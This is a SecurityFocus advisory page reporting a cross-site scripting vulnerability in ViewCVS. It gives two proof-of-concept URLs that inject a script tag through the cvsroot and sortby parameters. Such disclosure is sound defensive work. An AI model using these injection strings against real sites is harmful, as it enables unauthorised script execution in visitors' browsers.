Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

ViewCVS Cross-Site Scripting Vulnerability

The following examples may be used to reproduce this condition (results may vary depending upon the web browser)

http://target/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>

http://target/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>







 

Privacy Statement
Copyright 2008, SecurityFocus